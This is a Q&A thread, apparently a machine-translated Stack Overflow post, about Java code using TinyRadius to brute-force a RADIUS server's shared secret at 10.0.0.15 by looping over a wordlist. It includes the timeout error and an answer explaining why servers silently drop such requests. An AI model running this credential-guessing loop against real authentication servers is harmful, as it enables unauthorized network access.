无法连接到 RADIUS 服务器

Question

所以我在 10.0.0.15 有一个 RADIUS 服务器运行ning。我必须暴力破解它的共享秘密。我正在使用 TinyRaidus Java 库。

这是我的代码：

String s = "big line...";
String[] words = s.split("\W+");
        String host, userName, password;
        userName = "admin";
        password = "pass";
        host = "10.0.0.15";
        int count = words.length;
        for (String word : words) {
            System.err.println("Left: " + count);
            RadiusClient rc = new RadiusClient(host, word);
            try {
                if (rc.authenticate(userName, password)) {
                    System.out.print("Cracked. Secret is: " + word);
                    break;
                }
            } catch (IOException ex) {
                Logger.getLogger(RadiusBrute.class.getName()).log(Level.SEVERE, null, ex);
            } catch (RadiusException ex) {
                Logger.getLogger(RadiusBrute.class.getName()).log(Level.SEVERE, null, ex);
            }
        }

然而，每次我运行这个，我都会得到这个错误：

Jun 21, 2016 12:48:28 AM org.tinyradius.util.RadiusClient communicate
SEVERE: communication failure (timeout), no more retries
Jun 21, 2016 12:48:28 AM radiusbrute.RadiusBrute main
SEVERE: null
java.net.SocketTimeoutException: Receive timed out
        at java.net.PlainDatagramSocketImpl.receive0(Native Method)
        at java.net.AbstractPlainDatagramSocketImpl.receive(AbstractPlainDatagramSocketImpl.java:144)
        at java.net.DatagramSocket.receive(DatagramSocket.java:812)
        at org.tinyradius.util.RadiusClient.communicate(RadiusClient.java:249)
        at org.tinyradius.util.RadiusClient.authenticate(RadiusClient.java:83)
        at org.tinyradius.util.RadiusClient.authenticate(RadiusClient.java:65)
        at radiusbrute.RadiusBrute.main(RadiusBrute.java:284)

我哪里做错了？谢谢

Answer 1

看起来您的 RADIUS 服务器默默地丢弃了您的 RADIUS 访问请求。根据 RADIUS 服务器的实施，原因可能是以下之一：

RADIUS 服务器没有作为配置的客户端发送请求的主机：来自 RADIUS RFC 2865:

A request from a client for which the RADIUS server does not have a shared secret MUST be silently discarded. 2. You sent too many failed requests from your client and RADIUS server banned your client by its IP address and drops all subsequent requests 3. (Unlikely) RADIUS server is configured to drop request with wrong username/password instead of sending RADIUS Access-Reject

无法连接到 RADIUS 服务器

Unable To Connect To RADIUS Server

java

radius-protocol